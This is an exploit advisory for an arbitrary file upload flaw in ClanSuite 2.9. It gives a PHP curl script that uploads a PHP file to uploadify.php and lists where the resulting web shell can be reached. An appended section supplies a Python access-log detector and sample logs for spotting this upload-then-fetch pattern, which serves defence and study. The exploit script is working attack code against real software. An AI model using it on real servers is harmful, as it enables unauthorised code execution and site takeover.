ClanSuite 2.9 Arbitrary File Upload Vulnerability
<?php
// Local file that is sent as the upload body.
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
// The endpoint path differs between releases; only one curl_init() call should be active.
$c = curl_init("http://www.xxoo.com/uploads/uploadify.php"); // Version 2.9
// $c = curl_init("http://www.xxoo.com/application/uploads/uploadify.php"); // Version trunk
curl_setopt($c, CURLOPT_POST, true);
// Multipart POST: 'Filedata' carries the file, 'name' the filename sent with it.
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$u",
'name'=>"info.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
Shell location:
http://www.xxoo.com/uploads/temps/info.php
Or: http://www.xxoo.com/application/uploads/temps/info.php
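For defenders, the request pattern above (a POST to uploadify.php, then a request for a script under uploads/temps/) can be searched for in web server access logs. The following is an added example, not part of the original advisory or of ClanSuite; it assumes Apache/nginx "combined" log format, and the function name and sample log lines are constructed for illustration.

```python
import re

# Endpoint and drop-directory paths as listed on this page (2.9 and trunk layouts).
UPLOAD_RE = re.compile(r"^/(?:application/)?uploads/uploadify\.php(?:\?|$)")
DROP_RE = re.compile(
    r"^/(?:application/)?uploads/temps/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|$)", re.I)
# Assumption: "combined" access log format (client, timestamp, request line, status).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_upload_abuse(lines):
    """Flag requests for script files under uploads/temps/ and note whether the
    same client previously made a successful POST to uploadify.php."""
    posted = set()      # clients seen POSTing to the upload endpoint
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue    # skip lines that are not in the assumed format
        client, ts, method, path, status = m.groups()
        status = int(status)
        if method == "POST" and UPLOAD_RE.match(path) and status < 400:
            posted.add(client)
        elif DROP_RE.match(path):
            findings.append({
                "client": client, "time": ts, "path": path, "status": status,
                "uploaded_first": client in posted,  # upload then fetch, same client
                "served": status == 200,             # the script exists and was served
            })
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "POST /uploads/uploadify.php HTTP/1.1" 200 1 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Mar/2024:10:00:03 +0000] "GET /uploads/temps/info.php HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Mar/2024:10:05:00 +0000] "POST /uploads/uploadify.php HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:10:05:02 +0000] "GET /uploads/temps/avatar.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Mar/2024:10:09:00 +0000] "GET /application/uploads/temps/x.PHP?a=1 HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for f in find_upload_abuse(SAMPLE_LOG):
        print(f)
```

A finding with both `uploaded_first` and `served` set is the strongest signal. Any 200 response for a script under temps/ also shows that the upload directory is web-accessible and accepts script extensions.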